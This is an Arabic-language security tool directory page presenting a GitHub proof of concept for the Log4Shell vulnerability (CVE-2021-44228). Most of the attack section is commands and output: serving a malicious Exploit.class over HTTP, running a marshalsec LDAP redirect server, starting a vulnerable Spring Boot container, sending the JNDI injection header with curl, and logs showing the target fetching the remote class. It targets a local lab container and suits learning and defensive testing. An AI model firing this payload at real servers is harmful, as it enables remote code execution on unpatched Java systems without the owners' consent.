Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228 — إثبات المفهوم لـ CVE-2021-44228. | Kitploit
أدوات/GitHubGitHub/marcourbano/cve-2021-44228
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubmarcourbano/cve-2021-44228

CVE-2021-44228

إثبات المفهوم لـ CVE-2021-44228.

عرض المستودع
77منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4Shell POC (CVE-2021-44228)

يتمثل نطاق هذا المستودع في توفير جميع المكونات اللازمة لاستغلال CVE-2021-44228، الملقب بـ Log4Shell،
وإظهار كيفية استغلاله.

المكونات المطلوبة لاستغلال هذه الثغرة هي التالية:

  1. خادم LDAP يعيد توجيه التطبيق الضعيف إلى الاستغلال.
  2. تطبيق ضعيف (تطبيق ويب Spring Boot ضعيف أمام CVE-2021-44228) يستخدم إصدارًا ضعيفًا من Log4J.
  3. ملف Java Exploit.class (والملف المقابل هو ملف Exploit.java) الذي سيتم تحميله بواسطة التطبيق الضعيف.
  4. خادم http سيُحمِّل منه التطبيق الضعيف ملف Exploit.class الخبيث.

الاعتمادات:

  • تم سحب خادم LDAP من مستودع mbechler Marshalsec.
  • التطبيق الضعيف هو التطبيق المقدم من christophetd.

المتطلبات الأساسية:

  • Maven
  • Java
  • Docker
  • Python

تشغيل LDAP Server و HTTP Server

HTTP Server

1. انتقل إلى مجلد exploit وشغّل خادم http باستخدام Python.

root@kitploit:~
python3 -m http.server PORT

LDAP Server

1. انتقل إلى مجلد ldap_server وقم ببناء pom.xml

root@kitploit:~
mvn clean package -DskipTests

2. انتقل إلى مجلد target وشغّل الخادم مع تحديد http_server_ip و http_server_port

root@kitploit:~
java -cp ldap_server-1.0-all.jar marshalsec.jndi.LDAPRefServer "http://http_server_ip:http_server_port/#Exploit"

ملاحظة: يقوم هذا الأمر بتشغيل خادم ldap الخبيث من خلال إجباره على الرد بمعرف URI الخاص بـ Exploit.class على كل استعلام ldap.

تشغيل Vulnerable application

قم بتشغيل حاوية docker للتطبيق الضعيف

root@kitploit:~
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

ملاحظة: بشكل افتراضي نقوم بتشغيل التطبيق الضعيف على المنفذ 8080، لا تتردد في تغييره.

الاستغلال

بمجرد تشغيل كل من vulnerable_application و ldap_server و http_server ، أرسل طلب http خبيثًا إلى الخادم الضعيف.

root@kitploit:~
curl VULNERABLE_APPLICATION_IP:8080 -H 'X-Api-Version: ${jndi:ldap://ldap_server_ip:1389/a}'

سيقوم vulnerable_application بتسجيل الحمولة وتنفيذ استعلام ldap

root@kitploit:~
2021-12-24 18:48:14.644  INFO 1 --- [nio-8080-exec-1] HelloWorld: Received a request for API version ${jndi:ldap://10.0.2.15:1389/a}

سيجيب ldap_server بمعرف URI الخاص بـ Exploit.class

root@kitploit:~
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.0.2.15:8443/Exploit.class

سيستقبل http_server طلبًا إلى Exploit.class

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8443 (http://0.0.0.0:8443/) ...
172.17.0.2 - - [24/Dec/2021 19:48:14] "GET /Exploit.class HTTP/1.1" 200 -

أخيرًا، يمكننا التحقق من أن الاستغلال أنشأ ملفًا جديدًا على نظام ملفات الضحية. في هذا المثال نحتاج إلى فحص نظام ملفات حاوية docker.

المراجع

https://www.lunasec.io/docs/blog/log4j-zero-day/
https://github.com/mbechler/marshalsec
https://github.com/christophetd/log4shell-vulnerable-app

المساهمون

@CrashOverflow

تنزيل الأداة